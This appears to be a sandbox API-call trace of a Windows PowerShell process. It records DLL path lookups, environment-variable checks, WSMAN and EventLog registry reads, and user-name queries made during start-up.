	[0431.002] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x24cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0431.002] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x24cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0431.140] CoTaskMemAlloc (cb=0x104) returned 0x49d5b0
	[0431.140] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d5b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0431.140] CoTaskMemFree (pv=0x49d5b0) 
	[0431.141] CoTaskMemAlloc (cb=0x104) returned 0x49d5b0
	[0431.141] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d5b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0431.141] CoTaskMemFree (pv=0x49d5b0) 
	[0431.141] CoTaskMemAlloc (cb=0x104) returned 0x49d5b0
	[0431.141] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d5b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0431.141] CoTaskMemFree (pv=0x49d5b0) 
	[0431.141] CoTaskMemAlloc (cb=0x104) returned 0x49d5b0
	[0431.141] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d5b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0431.142] CoTaskMemFree (pv=0x49d5b0) 
	[0431.144] CoTaskMemAlloc (cb=0x104) returned 0x49d5b0
	[0431.144] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d5b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0431.144] CoTaskMemFree (pv=0x49d5b0) 
	[0431.145] CoTaskMemAlloc (cb=0x104) returned 0x49d5b0
	[0431.145] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d5b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0431.145] CoTaskMemFree (pv=0x49d5b0) 
	[0431.145] CoTaskMemAlloc (cb=0x104) returned 0x49d5b0
	[0431.145] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d5b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0431.145] CoTaskMemFree (pv=0x49d5b0) 
	[0431.148] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d238 | out: phkResult=0x24d238*=0x2f4) returned 0x0
	[0431.149] RegQueryInfoKeyW (in: hKey=0x2f4, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x24d13c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d138, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x24d13c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d138*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.149] CoTaskMemFree (pv=0x0) 
	[0431.150] CoTaskMemAlloc (cb=0x204) returned 0x4238e0
	[0431.150] RegEnumValueW (in: hKey=0x2f4, dwIndex=0x0, lpValueName=0x4238e0, lpcchValueName=0x24d1e8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x24d1e8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0431.150] CoTaskMemFree (pv=0x4238e0) 
	[0431.150] CoTaskMemAlloc (cb=0x204) returned 0x4238e0
	[0431.150] RegEnumValueW (in: hKey=0x2f4, dwIndex=0x1, lpValueName=0x4238e0, lpcchValueName=0x24d1e8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x24d1e8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0431.150] CoTaskMemFree (pv=0x4238e0) 
	[0431.150] CoTaskMemAlloc (cb=0x204) returned 0x4238e0
	[0431.150] RegEnumValueW (in: hKey=0x2f4, dwIndex=0x2, lpValueName=0x4238e0, lpcchValueName=0x24d1e8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x24d1e8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0431.150] CoTaskMemFree (pv=0x4238e0) 
	[0431.151] RegQueryValueExW (in: hKey=0x2f4, lpValueName="StackVersion", lpReserved=0x0, lpType=0x24d1cc, lpData=0x0, lpcbData=0x24d1c8*=0x0 | out: lpType=0x24d1cc*=0x1, lpData=0x0, lpcbData=0x24d1c8*=0x8) returned 0x0
	[0431.151] CoTaskMemAlloc (cb=0xc) returned 0x47d1a0
	[0431.151] RegQueryValueExW (in: hKey=0x2f4, lpValueName="StackVersion", lpReserved=0x0, lpType=0x24d19c, lpData=0x47d1a0, lpcbData=0x24d198*=0x8 | out: lpType=0x24d19c*=0x1, lpData="2.0", lpcbData=0x24d198*=0x8) returned 0x0
	[0431.151] CoTaskMemFree (pv=0x47d1a0) 
	[0431.278] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d188 | out: phkResult=0x24d188*=0x2f8) returned 0x0
	[0431.278] RegQueryInfoKeyW (in: hKey=0x2f8, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x24d08c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d088, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x24d08c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d088*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.278] CoTaskMemFree (pv=0x0) 
	[0431.278] CoTaskMemAlloc (cb=0x204) returned 0x4238e0
	[0431.278] RegEnumValueW (in: hKey=0x2f8, dwIndex=0x0, lpValueName=0x4238e0, lpcchValueName=0x24d138, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x24d138, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0431.278] CoTaskMemFree (pv=0x4238e0) 
	[0431.279] CoTaskMemAlloc (cb=0x204) returned 0x4238e0
	[0431.279] RegEnumValueW (in: hKey=0x2f8, dwIndex=0x1, lpValueName=0x4238e0, lpcchValueName=0x24d138, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x24d138, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0431.279] CoTaskMemFree (pv=0x4238e0) 
	[0431.279] CoTaskMemAlloc (cb=0x204) returned 0x4238e0
	[0431.279] RegEnumValueW (in: hKey=0x2f8, dwIndex=0x2, lpValueName=0x4238e0, lpcchValueName=0x24d138, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x24d138, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0431.279] CoTaskMemFree (pv=0x4238e0) 
	[0431.279] RegQueryValueExW (in: hKey=0x2f8, lpValueName="StackVersion", lpReserved=0x0, lpType=0x24d11c, lpData=0x0, lpcbData=0x24d118*=0x0 | out: lpType=0x24d11c*=0x1, lpData=0x0, lpcbData=0x24d118*=0x8) returned 0x0
	[0431.279] CoTaskMemAlloc (cb=0xc) returned 0x485d50
	[0431.279] RegQueryValueExW (in: hKey=0x2f8, lpValueName="StackVersion", lpReserved=0x0, lpType=0x24d0ec, lpData=0x485d50, lpcbData=0x24d0e8*=0x8 | out: lpType=0x24d0ec*=0x1, lpData="2.0", lpcbData=0x24d0e8*=0x8) returned 0x0
	[0431.279] CoTaskMemFree (pv=0x485d50) 
	[0431.279] CoTaskMemAlloc (cb=0x104) returned 0x49d5b0
	[0431.279] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d5b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0431.279] CoTaskMemFree (pv=0x49d5b0) 
	[0431.284] CoTaskMemAlloc (cb=0x104) returned 0x49d5b0
	[0431.284] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d5b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0431.284] CoTaskMemFree (pv=0x49d5b0) 
	[0431.288] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d1b8 | out: phkResult=0x24d1b8*=0x31c) returned 0x0
	[0431.290] RegQueryInfoKeyW (in: hKey=0x31c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x24d12c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d128, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x24d12c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d128*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.290] CoTaskMemFree (pv=0x0) 
	[0431.291] CoTaskMemAlloc (cb=0x204) returned 0x4238e0
	[0431.291] RegEnumKeyExW (in: hKey=0x31c, dwIndex=0x0, lpName=0x4238e0, lpcchName=0x24d1b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x24d1b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.291] CoTaskMemFree (pv=0x4238e0) 
	[0431.291] CoTaskMemFree (pv=0x0) 
	[0431.291] CoTaskMemAlloc (cb=0x204) returned 0x4238e0
	[0431.291] RegEnumKeyExW (in: hKey=0x31c, dwIndex=0x1, lpName=0x4238e0, lpcchName=0x24d1b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x24d1b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.291] CoTaskMemFree (pv=0x4238e0) 
	[0431.291] CoTaskMemFree (pv=0x0) 
	[0431.291] CoTaskMemAlloc (cb=0x204) returned 0x4238e0
	[0431.291] RegEnumKeyExW (in: hKey=0x31c, dwIndex=0x2, lpName=0x4238e0, lpcchName=0x24d1b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x24d1b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.291] CoTaskMemFree (pv=0x4238e0) 
	[0431.291] CoTaskMemFree (pv=0x0) 
	[0431.291] CoTaskMemAlloc (cb=0x204) returned 0x4238e0
	[0431.292] RegEnumKeyExW (in: hKey=0x31c, dwIndex=0x3, lpName=0x4238e0, lpcchName=0x24d1b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x24d1b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.292] CoTaskMemFree (pv=0x4238e0) 
	[0431.292] CoTaskMemFree (pv=0x0) 
	[0431.292] CoTaskMemAlloc (cb=0x204) returned 0x4238e0
	[0431.292] RegEnumKeyExW (in: hKey=0x31c, dwIndex=0x4, lpName=0x4238e0, lpcchName=0x24d1b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x24d1b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.292] CoTaskMemFree (pv=0x4238e0) 
	[0431.292] CoTaskMemFree (pv=0x0) 
	[0431.292] CoTaskMemAlloc (cb=0x204) returned 0x4238e0
	[0431.292] RegEnumKeyExW (in: hKey=0x31c, dwIndex=0x5, lpName=0x4238e0, lpcchName=0x24d1b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x24d1b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.292] CoTaskMemFree (pv=0x4238e0) 
	[0431.292] CoTaskMemFree (pv=0x0) 
	[0431.292] CoTaskMemAlloc (cb=0x204) returned 0x4238e0
	[0431.292] RegEnumKeyExW (in: hKey=0x31c, dwIndex=0x6, lpName=0x4238e0, lpcchName=0x24d1b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x24d1b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.292] CoTaskMemFree (pv=0x4238e0) 
	[0431.292] CoTaskMemFree (pv=0x0) 
	[0431.292] CoTaskMemAlloc (cb=0x204) returned 0x4238e0
	[0431.292] RegEnumKeyExW (in: hKey=0x31c, dwIndex=0x7, lpName=0x4238e0, lpcchName=0x24d1b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x24d1b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.292] CoTaskMemFree (pv=0x4238e0) 
	[0431.292] CoTaskMemFree (pv=0x0) 
	[0431.292] CoTaskMemAlloc (cb=0x204) returned 0x4238e0
	[0431.292] RegEnumKeyExW (in: hKey=0x31c, dwIndex=0x8, lpName=0x4238e0, lpcchName=0x24d1b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x24d1b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.292] CoTaskMemFree (pv=0x4238e0) 
	[0431.292] CoTaskMemFree (pv=0x0) 
	[0431.292] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d218 | out: phkResult=0x24d218*=0x2f0) returned 0x0
	[0431.293] RegOpenKeyExW (in: hKey=0x2f0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d218 | out: phkResult=0x24d218*=0x0) returned 0x2
	[0431.293] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d218 | out: phkResult=0x24d218*=0x320) returned 0x0
	[0431.293] RegOpenKeyExW (in: hKey=0x320, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d218 | out: phkResult=0x24d218*=0x0) returned 0x2
	[0431.293] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d218 | out: phkResult=0x24d218*=0x324) returned 0x0
	[0431.293] RegOpenKeyExW (in: hKey=0x324, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d218 | out: phkResult=0x24d218*=0x0) returned 0x2
	[0431.293] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d218 | out: phkResult=0x24d218*=0x328) returned 0x0
	[0431.293] RegOpenKeyExW (in: hKey=0x328, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d218 | out: phkResult=0x24d218*=0x0) returned 0x2
	[0431.293] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d218 | out: phkResult=0x24d218*=0x32c) returned 0x0
	[0431.293] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d218 | out: phkResult=0x24d218*=0x0) returned 0x2
	[0431.293] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d218 | out: phkResult=0x24d218*=0x330) returned 0x0
	[0431.293] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d218 | out: phkResult=0x24d218*=0x0) returned 0x2
	[0431.294] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d218 | out: phkResult=0x24d218*=0x334) returned 0x0
	[0431.294] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d218 | out: phkResult=0x24d218*=0x0) returned 0x2
	[0431.294] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d218 | out: phkResult=0x24d218*=0x338) returned 0x0
	[0431.294] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d218 | out: phkResult=0x24d218*=0x0) returned 0x2
	[0431.294] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d218 | out: phkResult=0x24d218*=0x33c) returned 0x0
	[0431.294] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d218 | out: phkResult=0x24d218*=0x340) returned 0x0
	[0431.294] RegCloseKey (hKey=0x340) returned 0x0
	[0431.294] RegCloseKey (hKey=0x31c) returned 0x0
	[0431.295] RegCloseKey (hKey=0x33c) returned 0x0
	[0431.303] CoTaskMemAlloc (cb=0x804) returned 0x40dfb0
	[0431.303] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x40dfb0, nSize=0x24d428 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x24d428) returned 0x1
	[0431.387] CoTaskMemFree (pv=0x40dfb0) 
	[0431.388] CoTaskMemAlloc (cb=0x204) returned 0x4238e0
	[0431.388] GetUserNameW (in: lpBuffer=0x4238e0, pcbBuffer=0x24d468 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x24d468) returned 1
	[0431.388] CoTaskMemFree (pv=0x4238e0) 
	[0431.530] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d168 | out: phkResult=0x24d168*=0x344) returned 0x0
	[0431.530] RegQueryInfoKeyW (in: hKey=0x344, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x24d0dc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d0d8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x24d0dc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d0d8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.530] CoTaskMemFree (pv=0x0) 
	[0431.530] CoTaskMemAlloc (cb=0x204) returned 0x4238e0
	[0431.530] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x0, lpName=0x4238e0, lpcchName=0x24d168, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x24d168, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.530] CoTaskMemFree (pv=0x4238e0) 
	[0431.530] CoTaskMemFree (pv=0x0) 
	[0431.530] CoTaskMemAlloc (cb=0x204) returned 0x4238e0
	[0431.530] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x1, lpName=0x4238e0, lpcchName=0x24d168, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x24d168, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.531] CoTaskMemFree (pv=0x4238e0) 
	[0431.531] CoTaskMemFree (pv=0x0) 
	[0431.531] CoTaskMemAlloc (cb=0x204) returned 0x4238e0
	[0431.531] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x2, lpName=0x4238e0, lpcchName=0x24d168, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x24d168, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.531] CoTaskMemFree (pv=0x4238e0) 
	[0431.531] CoTaskMemFree (pv=0x0) 
	[0431.531] CoTaskMemAlloc (cb=0x204) returned 0x4238e0
	[0431.531] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x3, lpName=0x4238e0, lpcchName=0x24d168, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x24d168, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.531] CoTaskMemFree (pv=0x4238e0) 
	[0431.531] CoTaskMemFree (pv=0x0) 
	[0431.531] CoTaskMemAlloc (cb=0x204) returned 0x4238e0
	[0431.531] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x4, lpName=0x4238e0, lpcchName=0x24d168, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x24d168, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.531] CoTaskMemFree (pv=0x4238e0) 
	[0431.531] CoTaskMemFree (pv=0x0) 
	[0431.531] CoTaskMemAlloc (cb=0x204) returned 0x4238e0
	[0431.531] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x5, lpName=0x4238e0, lpcchName=0x24d168, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x24d168, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.531] CoTaskMemFree (pv=0x4238e0) 
	[0431.531] CoTaskMemFree (pv=0x0) 
	[0431.531] CoTaskMemAlloc (cb=0x204) returned 0x4238e0
	[0431.531] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x6, lpName=0x4238e0, lpcchName=0x24d168, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x24d168, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.531] CoTaskMemFree (pv=0x4238e0) 
	[0431.531] CoTaskMemFree (pv=0x0) 
	[0431.531] CoTaskMemAlloc (cb=0x204) returned 0x4238e0
	[0431.532] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x7, lpName=0x4238e0, lpcchName=0x24d168, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x24d168, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.532] CoTaskMemFree (pv=0x4238e0) 
	[0431.532] CoTaskMemFree (pv=0x0) 
	[0431.532] CoTaskMemAlloc (cb=0x204) returned 0x4238e0
	[0431.532] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x8, lpName=0x4238e0, lpcchName=0x24d168, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x24d168, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0431.532] CoTaskMemFree (pv=0x4238e0) 
	[0431.532] CoTaskMemFree (pv=0x0) 
	[0431.532] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d1c8 | out: phkResult=0x24d1c8*=0x348) returned 0x0
	[0431.532] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d1c8 | out: phkResult=0x24d1c8*=0x0) returned 0x2
	[0431.532] RegOpenKeyExW (in: hKey=0x344, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d1c8 | out: phkResult=0x24d1c8*=0x34c) returned 0x0
	[0431.532] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d1c8 | out: phkResult=0x24d1c8*=0x0) returned 0x2
	[0431.532] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d1c8 | out: phkResult=0x24d1c8*=0x350) returned 0x0
	[0431.532] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d1c8 | out: phkResult=0x24d1c8*=0x0) returned 0x2
	[0431.533] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d1c8 | out: phkResult=0x24d1c8*=0x354) returned 0x0
	[0431.533] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d1c8 | out: phkResult=0x24d1c8*=0x0) returned 0x2
	[0431.533] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d1c8 | out: phkResult=0x24d1c8*=0x358) returned 0x0
	[0431.533] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d1c8 | out: phkResult=0x24d1c8*=0x0) returned 0x2
	[0431.533] RegOpenKeyExW (in: hKey=0x344, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d1c8 | out: phkResult=0x24d1c8*=0x35c) returned 0x0
	[0431.533] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d1c8 | out: phkResult=0x24d1c8*=0x0) returned 0x2
	[0431.533] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d1c8 | out: phkResult=0x24d1c8*=0x360) returned 0x0
	[0431.533] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d1c8 | out: phkResult=0x24d1c8*=0x0) returned 0x2
	[0431.533] RegOpenKeyExW (in: hKey=0x344, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d1c8 | out: phkResult=0x24d1c8*=0x364) returned 0x0
	[0431.533] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d1c8 | out: phkResult=0x24d1c8*=0x0) returned 0x2
	[0431.534] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d1c8 | out: phkResult=0x24d1c8*=0x368) returned 0x0
	[0431.534] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d1c8 | out: phkResult=0x24d1c8*=0x36c) returned 0x0
	[0431.534] RegCloseKey (hKey=0x36c) returned 0x0
	[0431.534] RegCloseKey (hKey=0x344) returned 0x0
	[0431.534] RegCloseKey (hKey=0x368) returned 0x0
